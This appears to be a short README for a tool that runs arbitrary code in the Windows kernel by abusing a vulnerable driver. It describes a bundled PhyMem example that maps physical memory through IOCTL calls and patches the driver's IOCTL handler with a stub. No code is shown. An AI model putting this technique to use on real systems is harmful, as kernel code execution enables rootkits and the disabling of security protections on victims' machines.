Arbitrary code execution inside of vulnerable driver
How's this works?
How can i customize it?
This solution have a PhyMem example out of the box.
You can use any driver that you want.
Dolboeb-executor have an abstract interface to create your own 'exploits' classes.
The PhyMem example overrides it like this.
A little explanation about how this phymem exploit works:
Well nothing interesting, it just passes IoCtl with map/unmap codes.
Then reads or writes to the mapped regions.
Function that this rva points to at line n70 is the IoCTL handler.
So we'll patch it to our stub and then call it via IoCTL.